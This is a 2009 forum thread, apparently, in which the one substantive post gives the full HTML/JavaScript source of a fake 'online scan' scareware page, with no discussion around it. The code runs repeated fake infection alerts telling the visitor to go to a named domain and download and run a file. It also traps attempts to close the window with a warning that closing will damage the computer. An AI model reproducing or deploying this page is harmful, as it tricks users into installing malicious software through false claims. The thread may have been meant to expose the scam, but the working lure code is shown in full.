Results 1 to 5 of 5
Hybrid View
-
22nd February 2009 23:00 #1
-
22nd February 2009 23:12 #2Registered User
Join Date: Feb:2008
Location: Sofia
Posts: 1,002
Code:<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>My computer Online Scan</title> <script type="text/javascript"> function getCookie(name){ var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } var st_visited=getCookie('visited'); function youHaveVirus(){ if(!getCookie('visited')){ if(st_visited){ window.onbeforeunload=function(){} document.location.reload(); } window.focus(); alert('Warning!!! your computer is infected!\nTo check your system and remove all harmful software write down this link \nTRADEDAUBLER.COM\nOpen a new Internet Explorer window and tape the address manually \nGo to the website, download and run downloaded file.\nFOR FREE!!!'); } setTimeout('youHaveVirus();',5000+Math.random()*5000); } youHaveVirus(); function closeIt(){ return "Warning!!! Closing this window will damage your computer. Press cancel."; } window.onbeforeunload=closeIt; </script> </head> <body> </body> </html>
-
22nd February 2009 23:17 #3
-
23rd February 2009 03:12 #4
-
23rd February 2009 18:11 #5




Reply With Quote



7th May 2023, 16:02 in PC